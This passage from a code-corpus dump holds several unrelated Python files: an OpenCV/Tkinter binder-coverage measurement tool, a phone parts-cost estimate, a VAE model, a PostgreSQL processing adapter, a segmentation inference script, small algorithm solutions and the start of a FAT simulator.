(máscara completa)\n self.img_find_mrc = np.zeros((1, 1, 3), dtype='float32') #imagem com partículas marcadas de vermelho para avaliar a limiarização\n \n self.img_count_lig = np.zeros((1, 1, 3), dtype='float32') #imagem com pixels de ligante BRANCOS após limiarização (para contagagem)\n self.img_count_bri = np.zeros((1, 1, 3), dtype='float32') #imagem com pixels de brilho BRANCOS após limiarização (para contagagem)\n\n self.i_ligante = np.zeros((1, 1, 3), dtype='float32') #imagem com pixels de ligante VERMELHOS após limiarização\n self.i_brilho = np.zeros((1, 1, 3), dtype='float32') #imagem com pixels de brilho VERMELHOS após limiarização\n\n self.id = []\n self.nAgreg = []\n self.nLigan = []\n self.nBrilh = []\n self.nCobrimento = []\n self.estatistic = []\n self.valor_limiar_lig = 0\n self.valor_limiar_bri = 0\n\n self.pasta = 'C:/Covered_Area_results'\n\n self.list_contours = []\n\n self.absolute_path = os.path.dirname(__file__)\n\n self.root = Tk()\n self.root.title(\"Covered Area\")\n self.root.state('zoomed')\n self.root.resizable(width=False, height=False)\n\n self.fAcao = LabelFrame(self.root, text=\"Ações\")\n self.fImagens = LabelFrame(self.root, text=\"Exibição de imagens\")\n self.fLimiares = LabelFrame(self.root, text=\"Controle de limiares\")\n\n self.fAcao.grid(row=0, column= 0)\n self.fImagens.grid(row=1, column= 0)\n self.fLimiares.grid(row=2, column= 0)\n\n self.lOriginal = Label(self.fImagens, text=\"Imagem original\")\n self.lObjetos = Label(self.fImagens, text=\"Objetos detectados\")\n self.lLigante = Label(self.fImagens, text=\"Imagem do Ligante\")\n self.lBrilho = Label(self.fImagens, text=\"Imagem do Brilho do ligante\")\n\n self.lOriginal.grid(row=0, column= 0)\n self.lObjetos.grid(row=0, column= 1)\n self.lLigante.grid(row=0, column= 2)\n self.lBrilho.grid(row=0, column= 3)\n \n self.bAbrir = Button(self.fAcao, text=\"Abrir imagem\", width= 10, cursor=\"hand2\", command=self.openImg)\n self.bReiniciar = Button(self.fAcao, text=\"Reiniciar\", fg=\"red\", width= 10, cursor=\"hand2\", command=self.reiniciar)\n self.bProcessar = Button(self.fAcao, text=\"Processar\", width= 10, cursor=\"hand2\", command=self.processar)\n self.bCalcular = Button(self.fAcao, text=\"Calcular\", width= 10, cursor=\"hand2\", command=self.calcular)\n self.bGravar = Button(self.fAcao, text=\"Gravar\", width= 10, cursor=\"hand2\", command=self.gravar)\n self.lQuantidade = Label(self.fAcao, text=\"Partículas: 0\")\n self.lCalculos = Label(self.fAcao, text=\"Agregado | Ligante | Brilho | Área coberta média | Desv. 
Pad.:\\n0 | 0 | 0 | 0% | 0%\")\n self.lLocal = Label(self.fAcao, text=f\"Arquivos em: {self.pasta}\")\n self.lPasta = Label(self.fAcao, text=\"Gravar na pasta:\")\n self.ePasta = Entry(self.fAcao, width=30)\n\n self.bReiniciar.grid(row=0, column= 0, rowspan= 2, padx= 5, pady= 5)\n self.bAbrir.grid(row=0, column= 1, rowspan= 2, padx= 5, pady= 5)\n self.bProcessar.grid(row=0, column= 2, rowspan= 2, padx= 5, pady= 5)\n self.bCalcular.grid(row=0, column= 3, rowspan= 2, padx= 5, pady= 5)\n self.bGravar.grid(row=0, column= 4, rowspan= 2, padx= 5, pady= 5)\n self.lQuantidade.grid(row=0, column= 5, rowspan= 2, padx= 5, pady= 5)\n self.lCalculos.grid(row=0, column= 6, rowspan= 2, padx= 5, pady= 5)\n self.lLocal.grid(row=0, column= 7, columnspan= 2, padx= 5, pady= 5)\n self.lPasta.grid(row=1, column= 7, padx= 5, pady= 5)\n self.ePasta.grid(row=1, column= 8, padx= 5, pady= 5)\n\n self.limiarTextL = Label(self.fLimiares, text=\"Limiar para identificar o ligante\")\n self.limiarTextB = Label(self.fLimiares, text=\"Limiar para identificar o brilho ligante\")\n self.limiarL = Scale(self.fLimiares, width= 20, length= 300, from_= 0, to= 255, orient= HORIZONTAL, cursor=\"hand2\", command=self.sliderL)\n self.limiarB = Scale(self.fLimiares, width= 20, length= 300, from_= 0, to= 255, orient= HORIZONTAL, cursor=\"hand2\", command=self.sliderB)\n self.cHist = Canvas(self.fLimiares, bg=\"black\",width=256, height=256)\n self.lLimiar = Label(self.fLimiares, text=\"Aplicar segmentação\")\n self.bLimiar = Button(self.fLimiares, text=\"Limiares\", width= 10, cursor=\"hand2\", command= lambda: self.aplicando_limiar(self.img_find_lig.copy(), self.img_find_bri.copy()))\n self.bOtsu = Button(self.fLimiares, text=\"Otsu\", width= 10, cursor=\"hand2\", command= lambda: self.aplicando_otsu(self.img_find_lig.copy(), self.img_find_bri.copy()))\n\n self.cHist.grid(row= 0, column= 0, rowspan= 7)\n self.limiarTextL.grid(row= 0, column= 1, columnspan= 2)\n self.limiarL.grid(row= 1, column= 1, columnspan= 2)\n self.limiarTextB.grid(row= 2, column= 1, columnspan= 2)\n self.limiarB.grid(row= 3, column= 1, columnspan= 2)\n self.lLimiar.grid(row= 4, column= 1, columnspan= 2)\n self.bLimiar.grid(row= 5, column= 1)\n self.bOtsu.grid(row= 5, column= 2)\n\n\n self.limiarB.set(255)\n self.bProcessar.config(state=\"disabled\")\n self.bCalcular.config(state=\"disabled\")\n self.bGravar.config(state=\"disabled\")\n self.bLimiar.config(state=\"disabled\")\n self.bOtsu.config(state=\"disabled\")\n self.limiarL.config(state=\"disabled\")\n self.limiarB.config(state=\"disabled\")\n \n self.root.mainloop()\n\n def reiniciar(self):\n os.execl(sys.executable, sys.executable, *sys.argv) #comando para reiniciar a aplicação\n\n def openImg(self):\n try:\n self.root.filename = filedialog.askopenfilename(initialdir=self.absolute_path, title=\"Selecione um arquivo\", filetypes=((\"Arquivo jpg\", \"*.jpg\"), (\"Arquivo png\", \"*.png\")))\n except:\n pass\n\n if(len(str(self.root.filename)) > 0):\n i = cv2.imread(str(self.root.filename), cv2.IMREAD_UNCHANGED)\n i = cv2.cvtColor(i, cv2.COLOR_BGR2RGB)\n self.img_o = i.copy()\n\n dir_path = os.path.dirname(str(self.root.filename))\n self.ePasta.delete(0, END)\n self.ePasta.insert(0, dir_path)\n\n self.lLocal.config(text=\"Arquio: \"+str(self.root.filename))\n self.bProcessar.config(state=\"normal\")\n self.bCalcular.config(state=\"disabled\")\n self.bGravar.config(state=\"disabled\")\n self.bLimiar.config(state=\"disabled\")\n self.bOtsu.config(state=\"disabled\")\n self.limiarL.config(state=\"disabled\")\n 
self.limiarB.config(state=\"disabled\")\n self.showImg(i, self.lOriginal)\n \n def showImg(self, img, place):\n i = img.copy()\n i = (i.astype('float32'))/255\n i_resize = self.resize(i)\n e_array = np.uint8((i_resize * 255))\n i_p = Image.fromarray(e_array)\n i_t = ImageTk.PhotoImage(i_p)\n place.config(image=i_t)\n place.image = i_t\n\n def resize(self, img):\n width_img = int(img.shape[1])\n height_img = int(img.shape[0])\n p=1.0\n\n w_r = self.root.winfo_width()\n h_r = self.root.winfo_height()\n h_fAcao = self.fAcao.winfo_reqheight()\n h_fLim = self.fLimiares.winfo_reqheight()\n\n max_height = h_r - (h_fAcao + h_fLim) - 5\n max_width = (w_r/4) - 5\n\n scale_h = max_height/height_img\n scale_w = max_width/width_img\n\n if scale_w < scale_h:\n p = scale_w\n else:\n p = scale_h\n\n # if width_img >= height_img:\n # if(width_img >= w_r/4):\n # p = (w_r/4 - 30)/width_img\n # else:\n # p = 1.0\n # else:\n # if(height_img >= h_r - (h_fAcao + h_fLim)):\n # p = (h_r - (h_fAcao + h_fLim) - 30)/height_img\n # else:\n # p = 1.0\n\n width_r = int(img.shape[1]*p)\n height_r = int(img.shape[0]*p)\n dim = (width_r, height_r)\n img_r = cv2.resize(img.copy(), dim)\n return img_r\n\n def processar(self):\n i = self.img_o.copy()\n self.find_contours(i)\n self.images_find(self.img_o.copy(), self.list_contours)\n self.drawHist(self.img_find_lig)\n \n self.bProcessar.config(state=\"disable\")\n self.bOtsu.config(state=\"normal\")\n self.limiarL.config(state=\"normal\")\n self.limiarB.config(state=\"normal\")\n \n def find_contours(self, img):\n i = img.copy()\n i = cv2.cvtColor(i, cv2.COLOR_RGB2LAB)\n a = i[:, :, 1]\n th = cv2.threshold(a,127,255,cv2.THRESH_BINARY+cv2.THRESH_OTSU)[1]\n kernel = np.ones((5,5),np.uint8)\n i_close = cv2.morphologyEx(th, cv2.MORPH_CLOSE, kernel)\n c_raw, h = cv2.findContours(i_close, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n c = self.filter_c(c_raw)\n \n i_marcada = img.copy()\n\n id_list = []\n count = 0\n for x in range(len(c)):\n M = cv2.moments(c[x])\n if (M['m00'] > 0):\n self.list_contours.append(c[x])\n\n M = cv2.moments(c[x])\n cx = int(M['m10'] / M['m00'])\n cy = int(M['m01'] / M['m00'])\n\n count+=1\n id_list.append(count)\n i_marcada = cv2.drawContours(i_marcada, c, x, (255, 0, 0), -1)\n i_marcada = cv2.putText(i_marcada, f\"{count}\", (cx-15, cy+15), cv2.FONT_HERSHEY_DUPLEX, 2, (0, 0, 255), 2)\n \n self.id = id_list\n self.img_find_mrc = i_marcada.copy()\n self.showImg(self.img_find_mrc, self.lObjetos)\n self.lQuantidade.config(text= f\"Partículas: {len(self.list_contours)}\")\n\n def images_find(self, img, contours):\n imgL = img.copy()\n imgB = img.copy()\n img_black = np.zeros(shape=img.shape, dtype=img.dtype)\n \n i_mask = cv2.drawContours(img_black, contours, -1, (255, 255, 255), -1)[:, :, 1]\n self.img_find_agr = i_mask.copy()\n\n i_mask_inv = 255 - i_mask\n imgL[i_mask_inv == 255] = (255, 255, 255)\n imgB[i_mask_inv == 255] = (0, 0, 0)\n\n self.img_find_lig = imgL\n self.img_find_bri = imgB\n \n def drawHist(self, im):\n img = cv2.cvtColor(im.copy(), cv2.COLOR_RGB2GRAY)\n hist = cv2.calcHist([img], [0], None, [256], [0, 256])\n\n sorted_array = sorted(hist, reverse=True)\n maxHist = sorted_array[1][0]\n\n self.cHist.delete('all')\n for i in range(256):\n v = float(hist[i])\n v = (v/maxHist)*255\n v = 256 - v\n if(v <= 255):\n self.cHist.create_line(i, 255, i, v, fill='red', width=1)\n\n def sliderL(self, var):\n t = float(self.limiarL.get())\n self.cHist.delete('t1')\n self.cHist.create_line(t, 255, t, 0, fill='yellow', width=1, tag='t1')\n\n 
self.bLimiar.config(state=\"normal\")\n self.bGravar.config(state=\"disable\")\n self.bCalcular.config(state=\"disable\")\n\n def sliderB(self, var):\n t = float(self.limiarB.get())\n self.cHist.delete('t2')\n self.cHist.create_line(t, 255, t, 0, fill='white', width=1, tag='t2')\n \n self.bGravar.config(state=\"disable\")\n self.bCalcular.config(state=\"disable\")\n\n def aplicando_limiar(self, imgL, imgB):\n ll = self.limiarL.get()\n lb = self.limiarB.get()\n il_cinza = cv2.cvtColor(imgL, cv2.COLOR_RGB2GRAY)\n ib_cinza = cv2.cvtColor(imgB, cv2.COLOR_RGB2GRAY)\n retl, i_ll = cv2.threshold(il_cinza, ll, 255, cv2.THRESH_BINARY_INV)\n retb, i_lb = cv2.threshold(ib_cinza, lb, 255, cv2.THRESH_BINARY)\n\n i_o_l = self.img_o.copy()\n i_o_b = self.img_o.copy()\n i_o_l[i_ll == 255] = (255, 0, 0)\n i_o_b[i_lb == 255] = (255, 0, 0)\n\n self.img_count_lig = i_ll\n self.img_count_bri = i_lb\n\n self.i_ligante = i_o_l\n self.i_brilho = i_o_b\n\n self.bCalcular.config(state=\"normal\")\n self.bGravar.config(state=\"disable\")\n self.showImg(i_o_l, self.lLigante)\n self.showImg(i_o_b, self.lBrilho)\n\n def aplicando_otsu(self, imgL, imgB):\n ll = self.limiarL.get()\n lb = self.limiarB.get()\n il_cinza = cv2.cvtColor(imgL, cv2.COLOR_RGB2GRAY)\n ib_cinza = cv2.cvtColor(imgB, cv2.COLOR_RGB2GRAY)\n retl, i_ll = cv2.threshold(il_cinza, 0, 255, cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU)\n retb, i_lb = cv2.threshold(ib_cinza, lb, 255, cv2.THRESH_BINARY)\n\n t = float(retl)\n self.limiarL.set(t)\n self.cHist.delete('t1')\n self.cHist.create_line(t, 255, t, 0, fill='yellow', width=1, tag='t1')\n\n i_o_l = self.img_o.copy()\n i_o_b = self.img_o.copy()\n i_o_l[i_ll == 255] = (255, 0, 0)\n i_o_b[i_lb == 255] = (255, 0, 0)\n\n self.img_count_lig = i_ll\n self.img_count_bri = i_lb\n\n self.i_ligante = i_o_l\n self.i_brilho = i_o_b\n\n self.bCalcular.config(state=\"normal\")\n self.bGravar.config(state=\"disable\")\n self.showImg(i_o_l, self.lLigante)\n self.showImg(i_o_b, self.lBrilho)\n\n def filter_c(self, contours_c):\n \n lenghts = []\n\n for i in contours_c:\n lenghts.append(len(i))\n\n q1 = np.percentile(np.array(lenghts), 25)\n q3 = np.percentile(np.array(lenghts), 75)\n diff = q3-q1\n factor = 1.5\n threshold = q1-(factor*diff)\n \n c_copy = np.copy(contours_c)\n for i, c in enumerate(contours_c):\n if lenghts[i] < threshold or lenghts[i] == threshold:\n c_copy[i] = None\n\n c_filtered = [c for c in c_copy if c is not None]\n return c_filtered\n\n def calcular(self):\n self.contar_pixel(self.list_contours, self.img_find_agr, 1)\n self.contar_pixel(self.list_contours, self.img_count_lig, 2)\n self.contar_pixel(self.list_contours, self.img_count_bri, 3)\n\n cobrimento = []\n statistic = []\n for i in range(len(self.nAgreg)):\n cobrimento.append(100*(self.nLigan[i] + self.nBrilh[i])/self.nAgreg[i])\n statistic.append('')\n\n self.nCobrimento = cobrimento\n a_cobrimento = np.asarray(cobrimento)\n \n media = np.average(a_cobrimento)\n desv_pad = np.std(a_cobrimento)\n self.valor_limiar_lig = float(self.limiarL.get())\n self.valor_limiar_bri = float(self.limiarB.get())\n statistic[0] = f\"{media}\"\n statistic[1] = f\"{desv_pad}\"\n statistic[2] = f\"{self.valor_limiar_lig}\"\n statistic[3] = f\"{self.valor_limiar_bri}\"\n self.estatistic = statistic\n\n self.lCalculos.config(text=f\"Agregado | Ligante | Brilho | Área coberta média | Desv. 
Pad.:\\n{sum(self.nAgreg)} | {sum(self.nLigan)} | {sum(self.nBrilh)} | {round(media, 2)}% | {round(desv_pad, 2)}\")\n \n self.bGravar.config(state=\"normal\")\n self.bCalcular.config(state=\"disable\")\n\n def gravar(self):\n pasta_armazenar = str(self.ePasta.get()).strip()\n if(len(pasta_armazenar) > 0): #removed and not self.tem_caracter_especial(pasta_armazenar)\n self.ePasta.config(bg=\"#90ee90\")\n img_or = cv2.cvtColor(self.img_o.copy(), cv2.COLOR_RGB2BGR)\n img_ma = cv2.cvtColor(self.img_find_mrc.copy(), cv2.COLOR_RGB2BGR)\n img_li = cv2.cvtColor(self.i_ligante.copy(), cv2.COLOR_RGB2BGR)\n img_br = cv2.cvtColor(self.i_brilho.copy(), cv2.COLOR_RGB2BGR)\n\n legenda = []\n for x in range(len(self.list_contours)):\n legenda.append('')\n \n legenda[0] = 'Media'\n legenda[1] = 'Desv. Pad.'\n legenda[2] = 'Limiar Ligante'\n legenda[3] = 'Limiar Brilho do ligante'\n\n agora = datetime.datetime.now()\n data_hora_formatada = agora.strftime(\"%d-%m-%Y_%H-%M-%S\")\n df = pd.DataFrame({'Id': self.id, 'Pixels Agregados': self.nAgreg, 'Pixels Ligante': self.nLigan, 'Pixels Brilho': self.nBrilh, 'Cobrimento': self.nCobrimento, 'Estatistica': self.estatistic, 'Legenda': legenda})\n \n pasta2 = f\"{pasta_armazenar}/{data_hora_formatada}\"\n\n if not (os.path.exists(pasta2)):\n os.mkdir(pasta2)\n \n df.to_csv(pasta2 + '/data_' + data_hora_formatada + '.csv', index=False)\n\n try:\n cv2.imwrite(pasta2 + '/imageOriginal_' + data_hora_formatada + '.jpg', img_or)\n cv2.imwrite(pasta2 + '/imageMarcada_' + data_hora_formatada + '.jpg', img_ma)\n cv2.imwrite(pasta2 + '/imageLigante_' + data_hora_formatada + '.jpg', img_li)\n cv2.imwrite(pasta2 + '/imageBrilho_' + data_hora_formatada + '.jpg', img_br)\n except:\n self.lCalculos.config(text=\"ERRO AO GRAVAR IMAGEM\")\n else:\n self.ePasta.config(bg=\"#ee9090\")\n\n def contar_pixel(self, contours, i_bin, var_contada):\n i_b = np.zeros(shape=i_bin.shape, dtype=i_bin.dtype)\n var_ = []\n for x in range(len(contours)):\n i_mask = cv2.drawContours(i_b.copy(), contours, x, (255), -1)\n i_mask_inv = 255 - i_mask\n i_contagem = i_bin.copy()\n i_contagem[i_mask_inv == 255] = (0)\n var_.append(cv2.countNonZero(i_contagem))\n \n vars_dict = {1: \"nAgreg\", 2: \"nLigan\"}\n setattr(self, vars_dict.get(var_contada, \"nBrilh\"), var_)\n\n def tem_caracter_especial(self, string):\n pattern = r'[^a-zA-Z0-9\\s]' # Padrão para verificar se há caracteres especiais\n print(bool(re.search(pattern, string)))\n return bool(re.search(pattern, string))\n\nif __name__ == '__main__':\n MainClass()","repo_name":"otavio04/Covered_Area_results","sub_path":"Covered_Area.py","file_name":"Covered_Area.py","file_ext":"py","file_size_in_byte":18594,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"16093539775","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n\n# iPhone 6 kostnader\n# http://recode.net/2014/09/23/teardown-shows-apples-iphone-6-cost-at-least-200-to-build/\n\n# koster 216-263 å lage (6+), selger for 749-949\n# bidrag: 533-686 (sykt bra)\n\ndef iphone6plus_recode(memory=128):\n # in dollars\n price_per_gig = 0.42\n cost = {\n \"assembly\": 4.5,\n \"memory\": price_per_gig*memory,\n \"display\": 52.5, # big display + touch\n \"cpu\": 20, # A8 + sensors, MASS produced\n \"sensors\": 22, # nfc + other sensors\n }\n\n # bedre teardown:\n # http://www.techinsights.com/teardown.com/apple-iphone-6/\n return sum(cost.values())\n\ndef iphone6plus():\n \"In dollars\"\n # from techinsights\n # 
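# --- Illustrative reduction of the covered-area measurement done by
# --- contar_pixel above (synthetic 100x100 example; the GUI, file I/O and
# --- thresholding steps are omitted).
import cv2
import numpy as np

canvas = np.zeros((100, 100), dtype=np.uint8)
contour = np.array([[10, 10], [90, 10], [90, 90], [10, 90]], dtype=np.int32).reshape(-1, 1, 2)

mask = cv2.drawContours(np.zeros_like(canvas), [contour], -1, 255, -1)  # filled particle
binder = np.zeros_like(canvas)
binder[40:60, 40:60] = 255                 # pretend these pixels passed the binder threshold

inside = binder.copy()
inside[mask == 0] = 0                      # keep binder pixels inside the particle only
coverage = 100.0 * cv2.countNonZero(inside) / cv2.countNonZero(mask)
print(f"covered area: {coverage:.1f}%")    # ~6.1% for this synthetic layout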
http://www.techinsights.com/teardown.com/apple-iphone-6/\n costs = {\n \"assembly and test\": 11,\n \"supporting materials\": 6,\n \"other\": 34.5,\n \"non-electric\": 18,\n \"power mgmt/audio\": 7,\n \"bb+xcr\": 27.5,\n \"cpu\": 37,\n \"sdram\": 5,\n \"nand\": 9,\n \"connectivity\": 13,\n \"camera\": 17.5,\n \"battery\": 6,\n \"display, touch + glass\": 51,\n }\n return sum(costs.values())\n\ndef our():\n \"In dollars\"\n # from techinsights\n # http://www.techinsights.com/teardown.com/apple-iphone-6/\n costs = {\n \"assembly and test\": 11,\n \"supporting materials\": 6,\n \"other\": 34.5,\n \"non-electric\": 18,\n \"power mgmt/audio\": 7,\n \"bb+xcr\": 27.5, # baseband and transceiver chips\n \"cpu\": 7, # atmega64 price if buy 1000 (industrial!)\n \"sdram\": 1, # minimal need, only buffers,\n # this one (sdram) is 1 gig samsung flash though\n # ram must hold at least 1 picture taken\n # for video rec, streams it, so must be able to hold buffer\n # also need some onboard RAM for minimal OS + keybaord\n \"nand\": 0, # no need for flash\n \"connectivity\": 13, # ?\n \"camera\": 17.5,\n \"battery\": 6,\n \"display, touch + glass\": 51,\n }\n # problemet med denne er de store kostnadene som other, non-electric,\n # bb+xcr\n\n # se også denne som har tallene klar:\n # http://www.iclarified.com/24444/iphone-5-bill-of-materials-estimated-at-16750\n return sum(costs.values())\n\n\nparts = iphone6plus()\nprice = 749\nprint(\"iPhone6+ parts %.2f\" % parts)\nprint(\" price %.2f\" % price)\nprint(\" net %.2f\" % (price-parts))\nprint()\nprint(\"Our:\")\nprint(\"Our parts: %.2f\" % our())\n","repo_name":"cslarsen/ele3701","sub_path":"beregninger/mobile.py","file_name":"mobile.py","file_ext":"py","file_size_in_byte":2481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"36379682385","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jan 29 10:24:43 2019\n\n@author: nsde\n\"\"\"\n\n#%%\nimport torch\nfrom torch import nn\nfrom torch import distributions as D\n\n#%%\nclass singleStd(nn.Module):\n def __init__(self, outputsize):\n super(singleStd, self).__init__()\n self.std = nn.Parameter(torch.tensor(0.02**2))\n self.outputsize = outputsize\n \n def forward(self, z):\n return self.std*torch.ones(*z.shape[:-1], self.outputsize, device=z.device)\n\n#%%\nclass VAE_single(nn.Module):\n def __init__(self, ):\n super(VAE_single, self).__init__()\n self.enc_mu = nn.Sequential(nn.Linear(2, 100), \n nn.ReLU(), \n nn.Linear(100, 2))\n self.enc_std = nn.Sequential(nn.Linear(2, 100), \n nn.ReLU(), \n nn.Linear(100, 2), \n nn.Softplus())\n self.dec_mu = nn.Sequential(nn.Linear(2, 100), \n nn.ReLU(), \n nn.Linear(100, 2))\n self.dec_std = nn.Sequential(singleStd(2),\n nn.Softplus())\n \n def encoder(self, x):\n return self.enc_mu(x), self.enc_std(x)\n \n def decoder(self, z, switch=1.0):\n x_mu, x_std = self.dec_mu(z), self.dec_std(z)\n x_std = switch*x_std + (1-switch)*torch.tensor(0.02**2)\n return x_mu, x_std\n \n def forward(self, x, beta=1.0, switch=1.0, iw_samples=1):\n # Encoder step\n z_mu, z_std = self.encoder(x)\n q_dist = D.Independent(D.Normal(z_mu, z_std), 1)\n z = q_dist.rsample([iw_samples])\n \n # Decoder step\n x_mu, x_std = self.decoder(z, switch)\n p_dist = D.Independent(D.Normal(x_mu, x_std), 1)\n \n # Calculate loss\n prior = D.Independent(D.Normal(torch.zeros_like(z),\n torch.ones_like(z)), 1)\n log_px = p_dist.log_prob(x)\n kl = q_dist.log_prob(z) - prior.log_prob(z)\n elbo = (log_px - beta*kl).mean()\n 
iw_elbo = elbo.logsumexp(dim=0) - torch.tensor(float(iw_samples)).log()\n \n return iw_elbo.mean(), log_px.mean(), kl.mean(), x_mu[0], x_std[0], z[0], z_mu, z_std","repo_name":"SkafteNicki/vae_variance_funcs","sub_path":"models/vae_single.py","file_name":"vae_single.py","file_ext":"py","file_size_in_byte":2338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"1218977651","text":"from __future__ import annotations\n\nimport abc\nimport logging\nfrom typing import (\n ClassVar,\n Generic,\n Sequence,\n TypeVar,\n Union,\n)\n\nimport attr\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects.postgresql.psycopg2 import PGDialect_psycopg2\nfrom sqlalchemy.engine.default import DefaultDialect\nfrom sqlalchemy.sql.base import Executable\n\nfrom dl_constants.enums import UserDataType\nfrom dl_core.connectors.base.query_compiler import QueryCompiler\nfrom dl_core.data_processing.processing.db_base.exec_adapter_base import ProcessorDbExecAdapterBase\nfrom dl_core.data_processing.streaming import AsyncChunkedBase\nfrom dl_core.db.sa_types import make_sa_type\n\nfrom dl_connector_postgresql.core.postgresql_base.type_transformer import PostgreSQLTypeTransformer\n\n\nLOGGER = logging.getLogger(__name__)\n\n_CONN_TV = TypeVar(\"_CONN_TV\")\n\n\n@attr.s\nclass PostgreSQLExecAdapterAsync(Generic[_CONN_TV], ProcessorDbExecAdapterBase, metaclass=abc.ABCMeta): # noqa\n \"\"\"\n PG-CompEng-specific adapter.\n Adds DDL functionality and PostgreSQL specificity to the base DB adapter.\n \"\"\"\n\n _conn: _CONN_TV = attr.ib(kw_only=True)\n _tt: PostgreSQLTypeTransformer = attr.ib(factory=PostgreSQLTypeTransformer, init=False)\n\n _log: ClassVar[logging.Logger] = LOGGER.getChild(\"PostgreSQLExecAdapterAsync\") # type: ignore # TODO: fix\n\n @property\n def dialect(self) -> DefaultDialect:\n # Note: not necessarily psycopg2, but should be close enough\n # (especially for debug-compile).\n return PGDialect_psycopg2()\n\n @abc.abstractmethod\n async def _execute(self, query: Union[str, Executable]) -> None:\n \"\"\"Execute query without (necessarily) fetching data\"\"\"\n\n async def _execute_ddl(self, query: Union[str, Executable]) -> None:\n \"\"\"Execute a DDL statement\"\"\"\n await self._execute(query)\n\n def _make_sa_table(self, table_name: str, names: Sequence[str], user_types: Sequence[UserDataType]) -> sa.Table:\n assert len(names) == len(user_types)\n columns = [\n sa.Column(name=name, type_=make_sa_type(native_type=self._tt.type_user_to_native(user_t=user_t)))\n for name, user_t in zip(names, user_types)\n ]\n return sa.Table(table_name, sa.MetaData(), *columns, prefixes=[\"TEMPORARY\"])\n\n async def create_table(\n self,\n *,\n table_name: str,\n names: Sequence[str],\n user_types: Sequence[UserDataType],\n ) -> None:\n \"\"\"Create table in database\"\"\"\n\n table = self._make_sa_table(table_name=table_name, names=names, user_types=user_types)\n self._log.info(f\"Creating PG processor table {table_name}: {table}\")\n await self._execute_ddl(sa.schema.CreateTable(table))\n\n async def _drop_table(self, table_name: str) -> None:\n await self._execute_ddl(sa.schema.DropTable(sa.table(table_name))) # type: ignore\n\n async def drop_table(self, table_name: str) -> None:\n \"\"\"Drop table in database\"\"\"\n\n self._log.info(f\"Dropping PG processor table {table_name}\")\n await self._drop_table(table_name=table_name)\n\n @abc.abstractmethod\n async def insert_data_into_table(\n self,\n *,\n table_name: str,\n names: Sequence[str],\n user_types: 
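# --- Side note (illustrative): the usual importance-weighted bound applies
# --- logsumexp over the iw_samples dimension *before* averaging over the
# --- batch; reducing to a scalar first loses the per-sample weights.
import torch

iw_samples, batch = 5, 3
log_w = torch.randn(iw_samples, batch)  # log p(x,z) - log q(z|x), per sample and item
iw_elbo = (torch.logsumexp(log_w, dim=0) - torch.log(torch.tensor(float(iw_samples)))).mean()
print(float(iw_elbo))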
Sequence[UserDataType],\n data: AsyncChunkedBase,\n ) -> None:\n \"\"\",,,\"\"\"\n\n def get_query_compiler(self) -> QueryCompiler:\n return QueryCompiler(dialect=self.dialect)\n","repo_name":"datalens-tech/datalens-backend","sub_path":"lib/dl_compeng_pg/dl_compeng_pg/compeng_pg_base/exec_adapter_base.py","file_name":"exec_adapter_base.py","file_ext":"py","file_size_in_byte":3459,"program_lang":"python","lang":"en","doc_type":"code","stars":99,"dataset":"github-code","pt":"54"} +{"seq_id":"7032376937","text":"from keras_segmentation.models.unet import vgg_unet\r\n\r\n\r\nweights = 'corrosionunet.h5'\r\ninput_dir = 'path/to/dir'\r\noutput_dir = 'path/to/dir'\r\nmodel = vgg_unet(n_classes=2 , input_height=512, input_width=512)\r\nmodel.load_weights(weights)\r\n\r\n\r\nmodel.summary()\r\n\r\n\r\nfrom keras_segmentation.predict import predict_multiple\r\n\r\npredict_multiple(model=model, inp_dir=input_dir,out_dir=output_dir )\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"LEERHyun/FinalProposal","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74766498080","text":"'''\ninput = \n 10 => 숫자 카드의 개수\n 6 3 2 10 10 10 -10 -10 7 3 => 숫자 카드\n 8 => 구할 숫자 개수\n 10 9 -5 2 3 4 5 -10 => 구할 숫자 \n'''\n\nn = int(input())\ncards = input().split()\nm = int(input())\nfinding = input().split()\n\ncheck = []\n\nfor i in range(m):\n if finding[i] in cards:\n check.append(cards.count(finding[i]))\n else:\n check.append(0)\n\nprint(*check)\n","repo_name":"ererink/TIL","sub_path":"Algorithm/BAEKJOON/Resolved/10816.py","file_name":"10816.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"ko","doc_type":"code","stars":6,"dataset":"github-code","pt":"54"} +{"seq_id":"28182372747","text":"from sys import stdin\n\ninput = stdin.readline\n\nn,m,k = map(int, input().split())\nfriend_price = list(map(int, input().split()))\n\nparent = [i for i in range(n)]\n\ndef solv():\n init()\n if m == 0:\n total = sum(friend_price)\n if k < total:\n print('Oh no')\n else:\n print(total)\n else:\n starts = set(parent)\n total = 0\n visited = [False]*n\n for idx in starts:\n idx = find(idx)\n if not visited[idx]:\n visited[idx] = True\n total += friend_price[idx]\n if k < total:\n print('Oh no')\n return\n print(total)\n\ndef init():\n for _ in range(m):\n a,b = map(int, input().split())\n union(a-1,b-1)\n\ndef find(target):\n if parent[target] == target:\n return target\n else:\n parent[target] = find(parent[target])\n return parent[target]\n\ndef union(a,b):\n a = find(a)\n b = find(b)\n if a != b:\n if friend_price[a] > friend_price[b]:\n parent[a] = b\n else:\n parent[b] = a\n\nsolv()","repo_name":"alsgh9948/Problem-Solving","sub_path":"baekjoon/16562.py","file_name":"16562.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"28015070894","text":"from helpers import *\nimport math\nfrom operaciones import *\n\ndef main():\n\n mem_total = memoria()\n print(mem_total, 'KB')\n sector = 64\n sectores = math.floor(mem_total / sector)\n print('Sectores Iniciales: ', sectores)\n archivos = {}\n fat = generar_fat(sectores)\n\n opc = mostrar_menu()\n\n\n while opc != 5:\n if opc==1:\n ingresado, archivos, fat, sectores, msg = ingresar_arch(sectores, sector, archivos, fat)\n if ingresado:\n print(msg)\n else:\n print(msg)\n 